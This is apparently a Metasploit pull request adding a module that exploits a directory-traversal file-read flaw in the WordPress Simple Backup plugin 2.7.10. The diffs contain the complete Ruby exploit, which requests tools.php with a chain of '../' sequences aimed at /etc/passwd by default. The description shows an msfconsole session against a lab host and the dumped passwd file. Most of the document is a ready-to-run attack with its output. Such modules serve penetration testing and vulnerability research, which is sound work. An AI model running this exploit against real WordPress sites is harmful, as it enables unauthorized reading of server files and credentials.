### PR TITLE
Add WordPress Simple Backup File Read Vulnerability.

### DIFF
--- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
@@ -78,7 +78,7 @@ class Metasploit3 < Msf::Auxiliary
 
       print_good("#{peer} - File saved in: #{path}")
     else
-      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")
+      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter or verify the correct filename.")
     end
   end
 end

--- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
@@ -1,0 +1,84 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+  include Msf::Auxiliary::Report
+  include Msf::HTTP::Wordpress
+  include Msf::Auxiliary::Scanner
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'WordPress Simple Backup File Read Vulnerability',
+      'Description'    => %q{
+        This module exploits a directory traversal vulnerability in WordPress Plugin
+        "Simple Backup" version 2.7.10, allowing to read arbitrary files with the
+        web server privileges.
+      },
+      'References'     =>
+        [
+          ['WPVDB', '7997'],
+          ['URL', 'http://packetstormsecurity.com/files/131919/']
+        ],
+      'Author'         =>
+        [
+          'Mahdi.Hidden', # Vulnerability Discovery
+          'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
+        ],
+      'License'        => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),
+        OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 6 ])
+      ], self.class)
+  end
+
+  def check
+    check_plugin_version_from_readme('simple-backup', '2.7.11')
+  end
+
+  def run_host(ip)
+    traversal = "../" * datastore['DEPTH']
+    filename = datastore['FILEPATH']
+    filename = filename[1, filename.length] if filename =~ /^\//
+
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => normalize_uri(wordpress_url_backend, 'tools.php'),
+      'vars_get' =>
+        {
+          'page'  => 'backup_manager',
+          'download_backup_file' => "#{traversal}#{filename}"
+        }
+    )
+
+    unless res && res.body
+      vprint_error("#{peer} - Server did not respond in an expected way.")
+      return
+    end
+
+    if res.code == 200 && res.body.length > 0 && res.headers['Content-Disposition'].include?('attachment; filename')
+
+      vprint_line("\n#{res.body}\n")
+      fname = datastore['FILEPATH']
+
+      path = store_loot(
+        'simplebackup.traversal',
+        'text/plain',
+        ip,
+        res.body,
+        fname
+      )
+
+      print_good("#{peer} - File saved in: #{path}")
+    else
+      print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")
+    end
+  end
+end

--- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
@@ -65,7 +65,7 @@ class Metasploit3 < Msf::Auxiliary
 
     if res.code == 200 && res.body.length > 0 && res.headers['Content-Disposition'].include?('attachment; filename')
 
-      vprint_line("\n#{res.body}\n")
+      vprint_line("#{res.body}")
       fname = datastore['FILEPATH']
 
       path = store_loot(

--- a/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
+++ b/modules/auxiliary/scanner/http/wp_simple_backup_file_read.rb
@@ -59,7 +59,7 @@ class Metasploit3 < Msf::Auxiliary
     )
 
     unless res && res.body
-      vprint_error("#{peer} - Server did not respond in an expected way.")
+      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way.")
       return
     end
 


### PR DESCRIPTION
#### Add Wordpress Plugin Simple Backup File Read Vulnerability.

  Application: Wordpress Plugin 'Simple Backup' 2.7.10
  Homepage: https://wordpress.org/plugins/simple-backup/
  Source Code: https://downloads.wordpress.org/plugin/simple-backup.2.7.10.zip
  Active Installs: 30,000+
  References: https://wpvulndb.com/vulnerabilities/7997
#### Vulnerable packages*

  2.7.10
#### Usage:
##### Linux (Ubuntu 14.04.2 LTS):

```
msf > use auxiliary/scanner/http/wp_simple_backup_file_read 
msf auxiliary(wp_simple_backup_file_read) > info

       Name: WordPress Simple Backup File Read Vulnerability
     Module: auxiliary/scanner/http/wp_simple_backup_file_read
    License: Metasploit Framework License (BSD)
       Rank: Normal

Provided by:
  Mahdi.Hidden
  Roberto Soares Espreto <robertoespreto@gmail.com>

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  DEPTH      6                yes       Traversal Depth (to reach the root folder)
  FILEPATH   /etc/passwd      yes       The path to the file to read
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      80               yes       The target port
  TARGETURI  /                yes       The base path to the wordpress application
  THREADS    1                yes       The number of concurrent threads
  VHOST                       no        HTTP server virtual host

Description:
  This module exploits a directory traversal vulnerability in 
  WordPress Plugin "Simple Backup" version 2.7.10, allowing to read 
  arbitrary files with the web server privileges.

References:
  https://wpvulndb.com/vulnerabilities/7997
  http://packetstormsecurity.com/files/131919/

msf auxiliary(wp_simple_backup_file_read) > show options 

Module options (auxiliary/scanner/http/wp_simple_backup_file_read):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DEPTH      6                yes       Traversal Depth (to reach the root folder)
   FILEPATH   /etc/passwd      yes       The path to the file to read
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target address range or CIDR identifier
   RPORT      80               yes       The target port
   TARGETURI  /                yes       The base path to the wordpress application
   THREADS    1                yes       The number of concurrent threads
   VHOST                       no        HTTP server virtual host

msf auxiliary(wp_simple_backup_file_read) > set RHOSTS 10.10.10.20
RHOSTS => 10.10.10.20
msf auxiliary(wp_simple_backup_file_read) > check
[*] 10.10.10.20:80 - The target appears to be vulnerable.
[*] Checked 1 of 1 hosts (100% complete)
msf auxiliary(wp_simple_backup_file_read) > run

[+] 10.10.10.20:80 - File saved in: /home/espreto/.msf4/loot/20150521121154_default_10.10.10.20_simplebackup_614708.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wp_simple_backup_file_read) > set VERBOSE true
VERBOSE => true
msf auxiliary(wp_simple_backup_file_read) > run

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
espreto:x:1000:1000:espreto,,,:/home/espreto:/bin/bash
vboxadd:x:999:1::/var/run/vboxadd:/bin/false
mysql:x:117:126:MySQL Server,,,:/nonexistent:/bin/false
postgres:x:1001:1001::/home/postgres:

[+] 10.10.10.20:80 - File saved in: /home/espreto/.msf4/loot/20150521121203_default_10.10.10.20_simplebackup_264070.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(wp_simple_backup_file_read) >
```
